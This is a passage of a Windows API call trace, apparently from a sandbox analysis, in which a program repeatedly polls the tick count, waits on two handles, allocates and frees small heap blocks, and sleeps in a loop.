GetTickCount () returned 0x20ca2e5 [0187.285] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87cf0 [0187.285] GetTickCount () returned 0x20ca2e5 [0187.285] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87cf0 | out: hHeap=0x2150000) returned 1 [0187.285] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0187.285] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.287] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.289] GetTickCount () returned 0x20cab8b [0187.289] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c70 [0187.289] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.289] GetTickCount () returned 0x20cab8b [0187.289] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87f00 [0187.289] GetTickCount () returned 0x20cab8b [0187.289] GetTickCount () returned 0x20cab8b [0187.289] GetTickCount () returned 0x20cab8b [0187.289] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87f00 | out: hHeap=0x2150000) returned 1 [0187.289] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.289] GetTickCount () returned 0x20cab8b [0187.289] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87720 [0187.289] GetTickCount () returned 0x20cab8b [0187.289] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87720 | out: hHeap=0x2150000) returned 1 [0187.289] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c70 | out: hHeap=0x2150000) returned 1 [0187.289] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.294] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.296] GetTickCount () returned 0x20cb421 [0187.296] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cf0 [0187.296] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.296] GetTickCount () returned 0x20cb421 [0187.296] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87c60 [0187.296] GetTickCount () returned 0x20cb421 [0187.296] GetTickCount () returned 0x20cb421 [0187.296] GetTickCount () returned 0x20cb421 [0187.296] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87c60 | out: hHeap=0x2150000) returned 1 [0187.296] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.296] GetTickCount () returned 0x20cb421 [0187.296] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87f30 [0187.296] GetTickCount () returned 0x20cb421 [0187.296] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87f30 | out: hHeap=0x2150000) returned 1 [0187.296] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cf0 | out: hHeap=0x2150000) returned 1 [0187.296] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.298] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.299] GetTickCount () returned 0x20cbcb7 [0187.300] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65070 [0187.300] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.300] GetTickCount () returned 0x20cbcb7 [0187.300] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87fc0 [0187.300] GetTickCount () returned 0x20cbcb7 [0187.300] GetTickCount () returned 0x20cbcb7 [0187.300] GetTickCount () returned 0x20cbcb7 [0187.300] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87fc0 | out: hHeap=0x2150000) returned 1 [0187.300] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.300] GetTickCount () returned 0x20cbcb7 [0187.300] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87fc0 [0187.300] GetTickCount () returned 0x20cbcb7 [0187.300] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87fc0 | out: hHeap=0x2150000) returned 1 [0187.300] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65070 | out: hHeap=0x2150000) returned 1 [0187.300] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.301] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.303] GetTickCount () returned 0x20cc54d [0187.303] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65070 [0187.303] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.303] GetTickCount () returned 0x20cc54d [0187.303] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87cf0 [0187.303] GetTickCount () returned 0x20cc54d [0187.303] GetTickCount () returned 0x20cc54d [0187.303] GetTickCount () returned 0x20cc54d [0187.303] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87cf0 | out: hHeap=0x2150000) returned 1 [0187.303] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.303] GetTickCount () returned 0x20cc54d [0187.303] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87e40 [0187.303] GetTickCount () returned 0x20cc54d [0187.303] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87e40 | out: hHeap=0x2150000) returned 1 [0187.303] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65070 | out: hHeap=0x2150000) returned 1 [0187.303] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.305] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.307] GetTickCount () returned 0x20ccdf3 [0187.307] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e30 [0187.307] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.307] GetTickCount () returned 0x20ccdf3 [0187.307] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87960 [0187.307] GetTickCount () returned 0x20ccdf3 [0187.307] GetTickCount () returned 0x20ccdf3 [0187.307] GetTickCount () returned 0x20ccdf3 [0187.307] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87960 | out: hHeap=0x2150000) returned 1 [0187.307] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.307] GetTickCount () returned 0x20ccdf3 [0187.307] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87f30 [0187.307] GetTickCount () returned 0x20ccdf3 [0187.307] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87f30 | out: hHeap=0x2150000) returned 1 [0187.307] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e30 | out: hHeap=0x2150000) returned 1 [0187.307] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.310] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.311] GetTickCount () returned 0x20cd689 [0187.311] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64af0 [0187.312] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.312] GetTickCount () returned 0x20cd689 [0187.312] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e880e0 [0187.312] GetTickCount () returned 0x20cd689 [0187.312] GetTickCount () returned 0x20cd689 [0187.312] GetTickCount () returned 0x20cd689 [0187.312] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e880e0 | out: hHeap=0x2150000) returned 1 [0187.312] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.312] GetTickCount () returned 0x20cd689 [0187.312] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e878d0 [0187.312] GetTickCount () returned 0x20cd689 [0187.312] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e878d0 | out: hHeap=0x2150000) returned 1 [0187.312] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64af0 | out: hHeap=0x2150000) returned 1 [0187.312] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.316] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.317] GetTickCount () returned 0x20cdf1f [0187.318] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0187.318] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.318] GetTickCount () returned 0x20cdf1f [0187.318] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e880e0 [0187.318] GetTickCount () returned 0x20cdf1f [0187.318] GetTickCount () returned 0x20cdf1f [0187.318] GetTickCount () returned 0x20cdf1f [0187.318] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e880e0 | out: hHeap=0x2150000) returned 1 [0187.318] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.318] GetTickCount () returned 0x20cdf1f [0187.318] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87ba0 [0187.318] GetTickCount () returned 0x20cdf1f [0187.318] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87ba0 | out: hHeap=0x2150000) returned 1 [0187.318] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0187.318] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.319] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.322] GetTickCount () returned 0x20ce7c4 [0187.322] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650f0 [0187.322] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.322] GetTickCount () returned 0x20ce7c4 [0187.322] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87900 [0187.322] GetTickCount () returned 0x20ce7c4 [0187.322] GetTickCount () returned 0x20ce7c4 [0187.322] GetTickCount () returned 0x20ce7c4 [0187.322] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87900 | out: hHeap=0x2150000) returned 1 [0187.322] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.322] GetTickCount () returned 0x20ce7c4 [0187.322] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e879f0 [0187.322] GetTickCount () returned 0x20ce7c4 [0187.322] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e879f0 | out: hHeap=0x2150000) returned 1 [0187.322] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650f0 | out: hHeap=0x2150000) returned 1 [0187.322] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.324] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.326] GetTickCount () returned 0x20cf05a [0187.326] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65070 [0187.326] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.326] GetTickCount () returned 0x20cf05a [0187.326] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87a50 [0187.326] GetTickCount () returned 0x20cf05a [0187.326] GetTickCount () returned 0x20cf05a [0187.326] GetTickCount () returned 0x20cf05a [0187.326] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87a50 | out: hHeap=0x2150000) returned 1 [0187.326] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.327] GetTickCount () returned 0x20cf05a [0187.327] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87f60 [0187.327] GetTickCount () returned 0x20cf05a [0187.327] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87f60 | out: hHeap=0x2150000) returned 1 [0187.327] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65070 | out: hHeap=0x2150000) returned 1 [0187.327] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.328] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.329] GetTickCount () returned 0x20cf8f0 [0187.329] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bb0 [0187.330] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.330] GetTickCount () returned 0x20cf8f0 [0187.330] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87780 [0187.330] GetTickCount () returned 0x20cf8f0 [0187.330] GetTickCount () returned 0x20cf8f0 [0187.330] GetTickCount () returned 0x20cf8f0 [0187.330] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87780 | out: hHeap=0x2150000) returned 1 [0187.330] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.330] GetTickCount () returned 0x20cf8f0 [0187.330] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87c00 [0187.330] GetTickCount () returned 0x20cf8f0 [0187.330] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87c00 | out: hHeap=0x2150000) returned 1 [0187.330] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bb0 | out: hHeap=0x2150000) returned 1 [0187.330] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.331] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.333] GetTickCount () returned 0x20d0186 [0187.333] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650b0 [0187.333] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.333] GetTickCount () returned 0x20d0186 [0187.333] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87db0 [0187.333] GetTickCount () returned 0x20d0186 [0187.333] GetTickCount () returned 0x20d0186 [0187.333] GetTickCount () returned 0x20d0186 [0187.333] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87db0 | out: hHeap=0x2150000) returned 1 [0187.333] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.333] GetTickCount () returned 0x20d0186 [0187.333] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87f60 [0187.333] GetTickCount () returned 0x20d0186 [0187.333] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87f60 | out: hHeap=0x2150000) returned 1 [0187.333] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650b0 | out: hHeap=0x2150000) returned 1 [0187.334] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.335] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.336] GetTickCount () returned 0x20d0a2c [0187.336] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0187.337] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.337] GetTickCount () returned 0x20d0a2c [0187.337] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87f90 [0187.337] GetTickCount () returned 0x20d0a2c [0187.337] GetTickCount () returned 0x20d0a2c [0187.337] GetTickCount () returned 0x20d0a2c [0187.337] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87f90 | out: hHeap=0x2150000) returned 1 [0187.337] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.337] GetTickCount () returned 0x20d0a2c [0187.337] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e877e0 [0187.337] GetTickCount () returned 0x20d0a2c [0187.337] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e877e0 | out: hHeap=0x2150000) returned 1 [0187.337] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0187.337] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.338] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.342] GetTickCount () returned 0x20d12c2 [0187.342] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650f0 [0187.342] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.342] GetTickCount () returned 0x20d12c2 [0187.342] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87ab0 [0187.342] GetTickCount () returned 0x20d12c2 [0187.342] GetTickCount () returned 0x20d12c2 [0187.342] GetTickCount () returned 0x20d12c2 [0187.343] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87ab0 | out: hHeap=0x2150000) returned 1 [0187.343] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.343] GetTickCount () returned 0x20d12c2 [0187.343] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88200 [0187.343] GetTickCount () returned 0x20d12c2 [0187.343] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e88200 | out: hHeap=0x2150000) returned 1 [0187.343] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650f0 | out: hHeap=0x2150000) returned 1 [0187.343] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.344] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.346] GetTickCount () returned 0x20d1b58 [0187.346] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ff0 [0187.346] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.346] GetTickCount () returned 0x20d1b58 [0187.346] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87b40 [0187.346] GetTickCount () returned 0x20d1b58 [0187.346] GetTickCount () returned 0x20d1b58 [0187.346] GetTickCount () returned 0x20d1b58 [0187.346] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87b40 | out: hHeap=0x2150000) returned 1 [0187.346] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.346] GetTickCount () returned 0x20d1b58 [0187.346] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87870 [0187.346] GetTickCount () returned 0x20d1b58 [0187.346] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87870 | out: hHeap=0x2150000) returned 1 [0187.346] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ff0 | out: hHeap=0x2150000) returned 1 [0187.346] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.351] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.352] GetTickCount () returned 0x20d23fd [0187.352] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64eb0 [0187.353] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.353] GetTickCount () returned 0x20d23fd [0187.353] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88230 [0187.353] GetTickCount () returned 0x20d23fd [0187.353] GetTickCount () returned 0x20d23fd [0187.353] GetTickCount () returned 0x20d23fd [0187.353] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e88230 | out: hHeap=0x2150000) returned 1 [0187.353] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.353] GetTickCount () returned 0x20d23fd [0187.353] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e881d0 [0187.353] GetTickCount () returned 0x20d23fd [0187.353] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e881d0 | out: hHeap=0x2150000) returned 1 [0187.353] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64eb0 | out: hHeap=0x2150000) returned 1 [0187.353] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.354] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.358] GetTickCount () returned 0x20d2c93 [0187.358] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65070 [0187.358] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.359] GetTickCount () returned 0x20d2c93 [0187.359] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e880e0 [0187.359] GetTickCount () returned 0x20d2c93 [0187.359] GetTickCount () returned 0x20d2c93 [0187.359] GetTickCount () returned 0x20d2c93 [0187.359] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e880e0 | out: hHeap=0x2150000) returned 1 [0187.359] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.359] GetTickCount () returned 0x20d2c93 [0187.359] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87720 [0187.359] GetTickCount () returned 0x20d2c93 [0187.359] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87720 | out: hHeap=0x2150000) returned 1 [0187.359] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65070 | out: hHeap=0x2150000) returned 1 [0187.359] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.360] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.362] GetTickCount () returned 0x20d3529 [0187.362] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0187.362] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.362] GetTickCount () returned 0x20d3529 [0187.362] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87cf0 [0187.362] GetTickCount () returned 0x20d3529 [0187.362] GetTickCount () returned 0x20d3529 [0187.362] GetTickCount () returned 0x20d3529 [0187.362] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87cf0 | out: hHeap=0x2150000) returned 1 [0187.362] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.362] GetTickCount () returned 0x20d3529 [0187.362] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87d50 [0187.362] GetTickCount () returned 0x20d3529 [0187.362] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87d50 | out: hHeap=0x2150000) returned 1 [0187.362] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0187.362] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.364] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.366] GetTickCount () returned 0x20d3dbf [0187.366] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64af0 [0187.366] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.366] GetTickCount () returned 0x20d3dbf [0187.366] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87de0 [0187.366] GetTickCount () returned 0x20d3dbf [0187.366] GetTickCount () returned 0x20d3dbf [0187.366] GetTickCount () returned 0x20d3dbf [0187.366] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87de0 | out: hHeap=0x2150000) returned 1 [0187.366] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.366] GetTickCount () returned 0x20d3dbf [0187.366] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87bd0 [0187.366] GetTickCount () returned 0x20d3dbf [0187.366] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87bd0 | out: hHeap=0x2150000) returned 1 [0187.366] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64af0 | out: hHeap=0x2150000) returned 1 [0187.366] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.367] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.369] GetTickCount () returned 0x20d4665 [0187.369] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e30 [0187.369] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.369] GetTickCount () returned 0x20d4665 [0187.369] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87b70 [0187.369] GetTickCount () returned 0x20d4665 [0187.369] GetTickCount () returned 0x20d4665 [0187.369] GetTickCount () returned 0x20d4665 [0187.369] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87b70 | out: hHeap=0x2150000) returned 1 [0187.369] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.369] GetTickCount () returned 0x20d4665 [0187.369] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87780 [0187.369] GetTickCount () returned 0x20d4665 [0187.369] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87780 | out: hHeap=0x2150000) returned 1 [0187.369] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e30 | out: hHeap=0x2150000) returned 1 [0187.370] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.371] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.375] GetTickCount () returned 0x20d4efb [0187.375] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64f70 [0187.375] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.375] GetTickCount () returned 0x20d4efb [0187.375] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87db0 [0187.375] GetTickCount () returned 0x20d4efb [0187.375] GetTickCount () returned 0x20d4efb [0187.375] GetTickCount () returned 0x20d4efb [0187.375] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87db0 | out: hHeap=0x2150000) returned 1 [0187.375] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.375] GetTickCount () returned 0x20d4efb [0187.375] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88050 [0187.375] GetTickCount () returned 0x20d4efb [0187.375] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e88050 | out: hHeap=0x2150000) returned 1 [0187.376] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64f70 | out: hHeap=0x2150000) returned 1 [0187.376] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.377] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.378] GetTickCount () returned 0x20d5791 [0187.379] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0187.379] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.379] GetTickCount () returned 0x20d5791 [0187.379] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87930 [0187.379] GetTickCount () returned 0x20d5791 [0187.379] GetTickCount () returned 0x20d5791 [0187.379] GetTickCount () returned 0x20d5791 [0187.379] HeapFree (in: hHeap=0x2150000, 